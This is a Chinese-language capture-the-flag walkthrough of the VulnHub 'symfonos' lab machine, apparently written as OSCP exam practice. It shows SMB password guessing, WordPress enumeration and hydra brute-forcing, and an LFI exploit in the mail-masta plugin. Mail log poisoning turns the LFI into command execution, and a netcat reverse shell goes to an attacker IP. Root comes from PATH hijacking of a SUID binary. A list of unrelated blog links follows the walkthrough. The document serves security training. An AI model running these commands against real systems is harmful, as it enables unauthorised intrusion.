OSCP - symfonos writeup
主机来源:www.vulnhub.com
下载地址:https://download.vulnhub.com/symfonos/symfonos1.7z
用到的知识点:
SMB使用
wpscan
本地文件包含和写邮件getshell
修改环境变量提权
发现IP
IP为10.0.3.150
nmap
SMB
直接使用SMB协议,使用anonymous用户登录
发现一个文件
我猜有人用了这些密码
还发现一个用户
试一下用上面的密码登录下helios
smbclient //10.0.3.150/helios --user=helios
最后用了qwerty进来了
全部get下来读一下
根据他说的work on /h3l105 我就去web下访问了,结果真有
wordpress兄弟,上wpscan 这里插一句,站点会解析到symfonos.local中, 我们在/etc/hosts的文件中修改一下(不改也行,就是访问的慢一些)
wpscan
wpscan --url http://10.0.3.150/h3l105 --wp-content-dir -ep -et -eu
找到一个用户,是admin
我爆破一下(没暴破出来)
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.0.3.150
扫插件
wpscan --url http://symfonos.local/h3l105 --enumerate p
找到两个插件
去查一下有没有漏洞
有个本地文件包含
通过我们的实际插件地址去访问
后面拼接参数,发现漏洞存在
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
getshell
发现可以读本地文件,那如果要getshell,我们就需要能写进去一些什么,现在想到25端口是开着的,一定有用,那就用写邮件的方式去写文件进去。
先看一下我们能不能读邮件
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios
可以读,那接下来开始写邮件
已经收到邮件
执行shell
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=id
我们弹个shell回来
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=nc%2010.0.3.141%20443%20-e%20/bin/bash
变个好用的shell
'import pty;pty.spawn("/bin/sh")'
提权
sudo -l了一下没东西
然后
find / -perm -u=s -type f 2>/dev/null
找到一个奇怪的程序,我们把他放在web目录下,然后下下来
本地strings一下
发现一个curl命令,没有加绝对路径,我们想办法去修改环境变量
先下一个rootshell过来,
然后编译他(这时候我在web目录下(var/www/html),因为这里我有写权限)
gcc rootshell.c -o curl
然后把这里加到环境变量的最前边
执行程序
获得root
OSCP - symfonos writeup相关推荐
- oscp——symfonos:3
0x00 前言 这个是练习的第6个机子. 目标地址 https://www.vulnhub.com/entry/symfonos-3,332/ 参考文章 https://www.wandouip.co ...
- OSCP - Raven writeup
主机来源:www.vulnhub.com 下载地址:https://download.vulnhub.com/raven/Raven.ova 用到的知识点: wpscan漏扫 hydra暴破 john ...
- OSCP 2021攻略之旅--从小白到通过
1.背景 本文提供给0基础小白,指导其如何学习通过OSCP. 本人CS硕士毕业,毕业后加入一家网络安全公司一直做传统网络安全产品研发工作(FW/IDS/IPS/WAF/scanner).现任谋厂研究员 ...
- Ichunqiu云境 —— Exchange Writeup
Ichunqiu云境 -- Exchange Writeup Author:小离-xiaoli 0x00 Intro OSCP 渗透风格,脱离C2和MSF之类的工具 Box 难度不高 0x01 Inf ...
- 【原创】Ichunqiu云境 —— Endless(无间计划) Writeup
Ichunqiu云境 -- Endless(无间计划) Writeup Author:小离-xiaoli 0x00 Intro 前言: 两个入口点,一个入口点是pboot-cms,另外一个是SQL注入 ...
- 2021年中国工业互联网安全大赛核能行业赛道writeup之usb流量分析
目录 一.USB协议 二.键盘流量 三.鼠标流量 四.writeup 附件题:usb流量分析 题目描述: 具体描述忘记了o(╯□╰)o 大概意思是有个U盘插到电脑上,然后经过一些操作导致该电脑重启了. ...
- 2021年中国工业互联网安全大赛核能行业赛道writeup之鱿鱼游戏
目录 一.尝试 二.Writeup 附加题 鱿鱼游戏(来自最近一部很火的韩剧) 题目描述: 小王由于操作不规范,误将不明U盘插入到上位机中,导致上位机中的某些关键文件被加密,但攻击者在U盘中还留下了一 ...
- 2018湖湘杯海选复赛Writeup
2018湖湘杯Writeup 0x01 签到题 0x02 MISC Flow 0x03 WEB Code Check 0x04 WEB Readflag 0x05 WEB XmeO 0x06 Reve ...
- php upload ctf,强网杯CTF防御赛ez_upload Writeup
这是强网杯拟态防御线下赛遇到的web题目,本来是不打算分享Writeup的,但是由于问的人很多,于是这里分享给大家. ez_upload这题算是非常经典的堆叠black trick的题目,算是比较典型 ...
最新文章
- C/C++中的复数介绍
- mysql根据bin log恢复_MySQL 通过 binlog 恢复数据
- cenos下安装MySQL最新版(5.7.18)记录。附卸载老版本过程
- **bootstrap常见常用样式总结
- js reduce数组循环相加x+y
- Hibernate第十一篇【配置C3P0数据库连接池、线程Session】
- MPMoviePlayerController属性,方法,通知整理
- Session Cookie 之我见
- 软件编码测试要点总结
- 怎么用计算机拨号手机,手机怎么连接电脑拨号打电话
- 2018年11月中旬香港, 吉隆坡8天游记
- 免费公开课:讲解DevExpress 2016.2新版本功能
- 全球运输工业的升级会带来什么
- opencv怎么找到手指最高处
- 硬盘安装windows系统
- 服务器的1U、2U、4U是指什么?
- 【D2Det】《 D2Det:Towards High Quality Object Detection and Instance Segmentation》
- cdr文件太大怎么转成小内存 CDR文件太大打不开怎么办
- 怎么知道一个日期是一年中的第几周?
- 【R 数据科学】R语言进行数据科学整理最有用的包大全
热门文章
- 图文一步步详细描述刷机Mobile 6.5 的过程(内涵6700、6750、6800、6900刷机工具及驱动)...
- Android SoftAP 实现框架
- html字体间距标签,css中字体间距怎么调?
- Python:图书管理系统
- Unity向量的点乘和叉乘的使用
- 应用商店成恶意APP滋生新温床 190款感染应用让你措不及防
- 前端和后端哪个工资高?做前端好还是做后端好?
- 百度地图实时监听缩放级别
- https://mp.weixin.qq.com/s/j7YdtmyuzBFRK1BViDtp2w
- 几所大学新增计算机相关专业研究生招生